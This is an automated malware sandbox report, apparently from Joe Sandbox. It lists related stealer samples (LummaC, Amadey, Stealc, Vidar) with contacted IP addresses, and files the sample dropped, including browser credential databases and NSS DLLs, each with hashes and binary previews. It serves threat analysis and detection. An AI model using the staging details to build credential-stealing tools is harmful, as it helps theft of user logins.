a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	104.21.80.1
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	35.244.181.201 34.149.100.209 34.160.144.191 151.101.129.91 34.120.208.123

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	hD7SED8r8Q.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	5EZLEXDveC.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	hD7SED8r8Q.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	5EZLEXDveC.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse

Created / dropped Files

C:\ProgramData\AAFIJKKEHJDHJKFIECAA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AAFIJKKEHJDHJKFIECAAKFIJJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAKJDGHIIJJKFHCFCA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\CBKJJJDH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIIDBGDAFHJDHIDGDGII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIJJEGDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJKEHIIJJECFHJKECFHDGIIDBG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1188.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Dec 9 23:44:27 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46272
Entropy (8bit):	2.550769722917859
Encrypted:	false
SSDEEP:	192:rctEd5X7MtAtXulul1urOyou3HmKCBPdOuAOeOFs5/Vygq4sugVNjINXjOnwY9YG:o4MtAElSuyfu3mKCJfwtzqi88Aho0
MD5:	DDA8BCC73FCD43866A0812AFC8E98FEF
SHA1:	6B9B4BEF43E5FC2845FAA90657EC1490C0BDB7F7
SHA-256:	54F09E00630D7AFCF4DF2FCA0E9DF302C87CCC91095F8612ED3B2AF61933B211
SHA-512:	E6AFFFDFEFD0D7CBECEB4C7267E0F7BEA99A01F9D2301A7EE5BE81B9DF5CCFFEE3D0A87971C3A4AB21809E97949BFA87EB6D3D3A72DDDF0BC7CFA904D79A1482
Malicious:	false
Preview:	MDMP..a..... ........Wg............4...........8...<.......T....,..........T.......8...........T............B...r..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.............Wg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER132F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8314
Entropy (8bit):	3.6901810045127355
Encrypted:	false
SSDEEP:	192:R6l7wVeJwm6St6YkY6DgmfJH9SpD089bIEsfBYm:R6lXJ56o6Yz6DgmfJH9+I3fL
MD5:	F2F3EBBCF32F48E6598F66D4034B0F59
SHA1:	9B67B1FAD0F3587002CC469B45BEE6472F30AD77
SHA-256:	C5B07380206272ED746548A93F43F3E466C67F424C2896D177FF112F8372AFCA
SHA-512:	9C4A19B6087ACB543518EFA6B691DCF0E3DE9E97ACDDE3EFA47B839AA5C4D3D26413D8AB2E4E0F9E9927F2DD966E898EA97492DD7588D765A08E63A8D9FF40AB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.3.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER13AD.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.443133043036796
Encrypted:	false
SSDEEP:	48:cvIwWl8zsjJg77aI9nkWpW8VYsQvYm8M4JUADFy+q866R0I3d:uIjf9I7197VZQyJU/+0I3d
MD5:	C0F48F0164C0E89B8BC30C5E8B526069
SHA1:	E7516A69B5FD26104442B65DBF3B505EA2BE25D0
SHA-256:	05C43572B6DCD6AF3DA96F71EA8B7E186D0D4ED3131EFE74948199634167ECFD
SHA-512:	0268CC51C0E2A3E5F56B70018EA1588F57D360DAA4BC6AD05D4743D17DC24B6296908F33ECE00DC2E26074FC31C82F2D6CFD95F3EC61A0594D1AE865C28AB7DA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624407" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: hD7SED8r8Q.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 5EZLEXDveC.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: hD7SED8r8Q.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 5EZLEXDveC.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.5549318047578797
Encrypted:	false
